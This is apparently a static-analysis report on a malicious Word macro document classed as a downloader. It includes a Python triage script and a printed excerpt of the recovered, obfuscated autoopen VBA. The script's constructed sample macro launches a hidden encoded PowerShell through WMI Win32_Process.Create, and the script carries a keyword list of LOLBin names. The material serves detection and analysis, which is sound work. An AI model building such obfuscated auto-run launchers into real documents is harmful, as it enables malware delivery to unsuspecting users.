Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 178f9807e09da56f…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 228.2 KB
Created: 2019-04-23 12:52:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: f065d501429a80a725d43d59dd8b3f92
SHA-1: e8a561e1ee7f5a1e057ad8a97267c382a4651857
SHA-256: 178f9807e09da56ff02b4c72907f5cec2a567527da4ee515aa6453f47e52a787
Risk score: 342

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1047 Windows Management Instrumentation (covers the Win32_Process.Create launch described below)

The sample carries a VBA project whose module k4DQDCA defines an autoopen procedure, so the code runs as soon as Word opens the document with macros enabled. The visible body of autoopen is padding: comparisons and arithmetic on variables that are never assigned, wrapped in If and Select Case blocks, so that its only meaningful statement is the call to the function jGCcxk, which begins with On Error Resume Next to suppress any run-time error. The heuristics below show that the macro uses GetObject and CreateObject to bind a WMI moniker (winmgmts:), obtain the Win32_Process class (a WMI class, not a service) and call its Create method, which launches an arbitrary command line without the Shell function ever appearing in the source, and that it reassembles these names from split string literals so that no single literal contains them. This execution chain is characteristic of downloader or dropper macros, consistent with the ClamAV Doc.Downloader classification.

Heuristics (9)

  • ClamAV: Doc.Downloader.00536d-6953162-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6953162-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    The VBA macro builds or references a WMI moniker (winmgmts:) for the Win32_Process class and invokes its .Create method to start a command line. This is a high-confidence macro execution chain that often hides the class name behind string concatenation or helper functions; because it goes through WMI, none of the usual Shell or WScript.Shell keywords need to appear in the source.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    The VBA concatenates short string literals that reassemble a dangerous API, ProgID or LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting such a name across a concatenation serves no purpose other than evading keyword scanning, so the reassembled strings, not the raw literals, are what an analyst should review.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure (here Sub autoopen in module k4DQDCA), which Word runs automatically when the document is opened with macros enabled.
  • GetObject call [high] OLE_VBA_GETOBJ
    The macro calls GetObject, the VBA function that binds to a COM object by moniker; together with the Win32_Process finding above, this is how the macro reaches WMI.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction failed, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. The generic rule text also states that no modern VBA project was recovered, which does not hold for this sample (see Extracted artifacts), so here the marker is redundant with OLE_VBA_AUTOOPEN rather than independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label shows which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI found in any Office document that carries drawing markup; it is not a download location or C2 indicator and should not be treated as an IOC.
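The following Python is an added illustration of the three checks behind OLE_VBA_AUTOOPEN, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION and OLE_VBA_WMI_PROCESS_CREATE; it is not the scanner's own implementation and it does not reproduce the real sample's decoded payload, which this page does not show. SAMPLE_VBA is a constructed macro that splits winmgmts:, Win32_Process and powershell across string literals the way the heuristics describe; the keyword list, the regular expressions and the folding strategy are assumptions chosen for the example, not taken from the report.

```python
"""Triage an extracted VBA source for the auto-exec, split-literal and
WMI Win32_Process.Create patterns.  Added example, not the scanner's code."""
import re

# Constructed sample macro for the demonstration (not the real sample's code).
SAMPLE_VBA = r'''
Sub autoopen()
    On Error Resume Next
    Dim m As String, c As String
    m = "winm" & "gmts:" & "{impersonationLevel=impersonate}!\\" & "." & "\root\cimv2"
    c = "Win32_" & "Pro" & "cess"
    Set w = GetObject(m).Get(c)
    w.Create "pow" + "ersh" + "ell -nop -w hidden -enc QQBBAEEA", Null, Null, pid
End Sub
'''

# Procedures Office runs without user interaction once macros are enabled.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|Auto_Open|AutoExec|AutoClose|Auto_Close|Document_Open|"
    r"Document_Close|Workbook_Open|Workbook_Close)\b",
    re.IGNORECASE | re.MULTILINE,
)

# Two adjacent string literals joined by & or +.  VBA escapes a quote inside
# a literal as "", so a literal body is a run of non-quote chars or "" pairs.
CONCAT_RE = re.compile(r'"((?:[^"]|"")*)"\s*[&+]\s*"((?:[^"]|"")*)"')

# Names a triage analyst greps for; the heuristic expects them to be split.
KEYWORDS = (
    "winmgmts", "win32_process", "wscript.shell", "scripting.filesystemobject",
    "shell.application", "powershell", "cmd.exe", "urldownloadtofile",
    "adodb.stream", "msxml2.xmlhttp",
)


def fold_concats(src: str) -> str:
    """Merge "a" & "b" into "ab" repeatedly until no adjacent pair is left."""
    while True:
        src, n = CONCAT_RE.subn(r'"\1\2"', src)
        if n == 0:
            return src


def find_autoexec(src: str) -> list[str]:
    """Names of auto-execution procedures defined in the source."""
    return [m.group(1) for m in AUTOEXEC_RE.finditer(src)]


def keywords_in(src: str) -> set[str]:
    low = src.lower()
    return {k for k in KEYWORDS if k in low}


def wmi_process_create(folded: str) -> bool:
    """WMI moniker + Win32_Process class + a .Create call in one source."""
    low = folded.lower()
    return ("winmgmts" in low and "win32_process" in low
            and re.search(r"\.\s*create\b", low) is not None)


def analyze(src: str) -> dict:
    """Run the checks on raw and on concatenation-folded source."""
    folded = fold_concats(src)
    visible = keywords_in(src)
    total = keywords_in(folded)
    return {
        "autoexec": find_autoexec(src),
        "keywords_visible": sorted(visible),
        # Only present after folding: split on purpose to defeat keyword scans.
        "keywords_hidden_by_split": sorted(total - visible),
        "wmi_process_create": wmi_process_create(folded),
        "folded_source": folded,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_VBA).items():
        if key != "folded_source":
            print(f"{key}: {value}")
```

On the constructed macro none of the keywords is visible in the raw text, all three appear after folding, and the WMI launch chain is confirmed, which is why the report rates the split-literal finding as critical rather than a mere style observation. The folding here only handles adjacent literals; macros that route strings through helper functions, Chr() sequences or Replace() calls need the richer expression evaluation that olevba's --deobf option attempts, or a debugger.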

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 54301 bytes
SHA-256: 3034ed6ee9f54b3c54f05739a1bdb76ee0fa801cddf7b876badd120454143ec0

Preview of the extracted script (first 1,000 lines; the listing below is truncated). The file concatenates every module olevba recovered, each introduced by its Attribute VB_Name header: D1CcBZ (ThisDocument), fc_AAwA, pwZDAx4, k4DQDCA (which holds autoopen) and NAAGAx (which holds jGCcxk).
Attribute VB_Name = "D1CcBZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fc_AAwA"
Attribute VB_Base = "0{81F90046-F000-4EF9-AF44-F42FE0A55724}{D2C3B2C8-BE07-4ECD-988A-C0C25F148762}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pwZDAx4"
Attribute VB_Base = "0{245879DE-D904-4092-A412-925BDFF02726}{3023D2C9-3203-4739-ABA4-99AAB363E9ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "k4DQDCA"
Sub autoopen()
   If jA1DBkU_ = aBXAAAB Then
     o1AUBUAA = jAAAAABo - JxQZD4Q
       ElseIf bA_DkDAA = kZDBUBXU Then
      Select Case m4_BCAQ
         Case 548330168
       z4CA4k = 215027331 * o1ZAA1AA / 432869682 * Hex(45369085 * Fix(uDAXCX / CStr(T4oGAU) * cc4DBxA - Fix(155235434)) - 217795143 * Round(dAAAZA + Hex(bA4AA4) / 188623171 - 317710786))
       sDAw4AA = RoXZcGA + XAUDAAQ * SGAGGAAD / Sqr(SwGAAAZX) / 358119641 - Hex(wxBBoAx) + (502493277 / 648866648)
      End Select
End If
   If uD_UQB = wDAABwQ Then
     QA1DAAG = wDBZAX_A - pAQ_ZAA
       ElseIf XAXQACCk = dCQZAAwx Then
      Select Case GDBAUU
         Case 149865841
       pAADxAA = 753230773 * cBA41wUx / 835856014 * Hex(874199805 * Fix(iAZQDB / CStr(RQAQAw) * oQ_AUXA - Fix(404708608)) - 65759152 * Round(JxDAAA + Hex(zB_A4x) / 409937193 - 509705358))
       OBDDAwA = cUQk_DB + w_Qc_D * QkoA1GAc / Sqr(KDXAAA) / 436852278 - Hex(YAc1AA1Q) + (284271312 / 666074343)
      End Select
End If
   If jD4oUAcA = AA_BAG Then
     O1AAUAD = DCBAwA - KAC4Ak
       ElseIf vBZ4cAA = JGGQU1AA Then
      Select Case pDUQDDAB
         Case 337206151
       AXAAQ_4k = 287716091 * NUAwGAAA / 137715823 * Hex(972143959 * Fix(XZQDAQ / CStr(vUDAZ4_4) * ZD_DAG - Fix(732554291)) - 104242557 * Round(C1Aokc + Hex(NUA4AAAo) / 631215250 - 880653204))
       tXAA_B = koDAk_A + LAQcAA * tDA1AxBD / Sqr(rAkU1w) / 228124811 - Hex(CUZAAXB) + (411062262 / 830862959)
      End Select
End If
jGCcxk
   If i1UX4A = d_DBBX Then
     oUAAQ1 = WUA44A - lUAAXB
       ElseIf cBADZAX = BBU4QADA Then
      Select Case vADQwZAo
         Case 854977795
       CAC1QXQG = 657574852 * wQBAABX / 375665113 * Hex(676201702 * Fix(FBkXAQBD / CStr(SocAA1) * r4BAUU - Fix(594406761)) - 961488528 * Round(iG__AD + Hex(K4kxA1) / 440327719 - 195188270))
       iDZ1AwB_ = WU4Dx4Q + tCAAAkAA * NAwAUUUA / Sqr(OA_GZG) / 479791808 - Hex(zXQBDU) + (956723461 / 675525872)
      End Select
End If
   If VAAcAkAC = MQoQZX Then
     Zk14QxQ = KDoAkXDA - lcABUUX
       ElseIf VX1QAUGG = MAXZwkoA Then
      Select Case SADoAA
         Case 366255453
       dXAQAA = 726970143 * wxAZGAU / 311388801 * Hex(529683524 * Fix(mBGAAZ / CStr(VADDZUBA) * NAZXDQQU - Fix(847712179)) - 135548263 * Round(Q1oAQAQ + Hex(WAAZ4o) / 652634622 - 917306054))
       iZ4AwAQ_ = fA_QA4 + YokkX_B * kAAoAA1 / Sqr(lxGAcA) / 659198582 - Hex(oXA4xAX) + (445893266 / 218018011)
      End Select
End If
   If KUxcAw_B = wDwxCc Then
     VQAGDA = BCXAADGA - QAAADXA
       ElseIf NABkCG = mXQ1DZA Then
      Select Case SAABGAA
         Case 537736671
       MDGAQAB = 232146891 * sAwABCc / 68509124 * Hex(135825386 * Fix(ZABAZBw / CStr(GB1wAU) * zCAAAUGk - Fix(422903076)) - 128044183 * Round(DDU_AQCk + Hex(a4AUA1) / 964875455 - 17394717))
       vADXCU = uUDUCBA + qUZ_Ak * h4CDUAU / Sqr(qA1wZA) / 913202339 - Hex(wcAAAA) + (565741123 / 116773894)
      End Select
End If
End Sub

Attribute VB_Name = "NAAGAx"
Function jGCcxk()
On Error Resume Next
   If sxAXQB = OBwBAc1c Then
     iQQACX1 = WCQCwB - kcAA_D
       ElseIf ODAAAAAA = zQ
... (truncated)